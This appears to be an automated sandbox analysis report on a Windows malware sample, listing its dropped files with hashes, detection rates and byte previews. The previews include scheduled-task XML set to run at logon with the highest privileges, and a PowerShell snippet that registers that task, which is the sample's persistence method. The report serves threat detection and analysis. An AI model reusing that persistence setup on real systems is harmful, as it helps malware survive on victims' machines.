                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...{*2g.........."......T4...i...................@......................................@.........................<.=.U.....=.@.....@..H^..........,...I...`.......k=.....................Pi=......q4.............@.=.l............................text....S4......T4................. ..`.rdata..`....p4......X4.............@..@.data........ >..R....=.............@....tls....u.....?......N>.............@...CPADinfo(.....?......P>.............@...malloc_h......@......R>............. ..`.rsrc....H^...@..H^..T>.............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1510207563435464
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulfkT/Z:NllUMT
                                                                                                MD5:D4FA57E524AF6F31660A084960CF6589
                                                                                                SHA1:28936BB37DAA2328742AA1B48F0DB33565DB5A07
                                                                                                SHA-256:6C8D419DBFA43F3540145F767A34D6F90487339EA5B5E150A6BA771EBA0593D4
                                                                                                SHA-512:2A35319EFC241394638E7BE9E1BE44FCB5F2F51F1FA21A5E3F80FC61B989B4D1C5E2A64959D799E9ACB453936CF9028FC2DB64357B1BEE9DB1F0822CE8FEE432
                                                                                                Malicious:false
                                                                                                Preview:@...e................................................@..........

                                                                                                C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1893
                                                                                                Entropy (8bit):5.212287775015203
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                                                C:\Users\user\AppData\Local\Temp\PolicyManagement.xml

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):5.172564010951281
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ck5XzDlybXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:75XzDlybGQhFdOFQOzBdKrKsTLXbV
                                                                                                MD5:A16DD00D191DC2FC881634D7DEE2026C
                                                                                                SHA1:53A373DC6DA7CA186695CCCB9BF3CFC205C45C58
                                                                                                SHA-256:27CD089F35A3AB92614414C0788900BC64C637B2FC011858932F335C88FEF23D
                                                                                                SHA-512:F430EB5753C428D3473485217865F9BC8C16804C211A2788E3B90D6F9CE499BF0842EB35A4519AD5223741348E4AB47F80A4F13004D5EE9B2CD0322B75E82264
                                                                                                Malicious:false
                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.6" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\.Net OneStart</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers />. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>.

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00ro3hm1.mcv.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1aeumgcj.z4i.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1aoi3n5q.45b.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nu2b3d3.5h4.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50gdeh2v.jsw.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpirpbus.hma.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c21tfybo.3u0.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq0pczsi.bpk.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enth5aiz.wvn.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxcyesdp.1on.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1aoip0t.iph.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3gvw2hm.0jf.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbut1all.ezg.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl51mfmk.b5c.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w02iv1tc.uvs.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wckf0ke3.mii.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wp1p22x1.jcj.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcm43res.dyr.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\updated.ps1

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.741657013789009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                Malicious:false
                                                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                C:\Users\user\AppData\Local\updated.ps1

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Roaming\FIWszl1A8l.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.741657013789009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                Malicious:false
                                                                                                Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                C:\Users\user\AppData\Roaming\FIWszl1A8l.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3213672
                                                                                                Entropy (8bit):6.451490735803889
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:xWKtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:btLutqgwh4NYxtJpkxhGU333X
                                                                                                MD5:F1C0A349EF488C9D2FDE3DD7F3C497BD
                                                                                                SHA1:20EB1D3D000BE4D3C06C88A54EEB57FB01B054D5
                                                                                                SHA-256:38E825894F85ED654A2BADB58F28B334597D2662952D9A5EC6918BD8C8B7335A
                                                                                                SHA-512:5BF3959F9C0A62CE75CB7317F28D09D662567F3E8F9B067880AE464B0D6124E05F37CDC453F2029950970A002D853DC6B0797CB3627632EF8365B6A04B52E6A0
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1.......1...@......@....................-.......-..9....................0.h-...........................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc.................-.............@..@..............1.......0.............@..@........................................................

                                                                                                C:\Users\user\AppData\Roaming\FIWszl1A8l.exe:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:true
                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                C:\Users\user\Downloads\ChromeSetup.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\FIWszl1A8l.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):10384768
                                                                                                Entropy (8bit):6.780997055675606
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:VpjYZ94Z6AhJ5NtGdDDIauMJZZCgdaTos7s4QA/rmYeus5dvXCKsJdVV3qHDYyYL:VpjwKZF5LGdDDvJZZCgdwbcAheus5xXU
                                                                                                MD5:8C6E8B9F0955CB1ACD92C7C43A8899ED
                                                                                                SHA1:42885DBB8DC515E8D706C9E2085245548E44373E
                                                                                                SHA-256:2CB24656EF0CA18A905190C553C2451D44FC09EF9261976450EFDF8C72E8E582
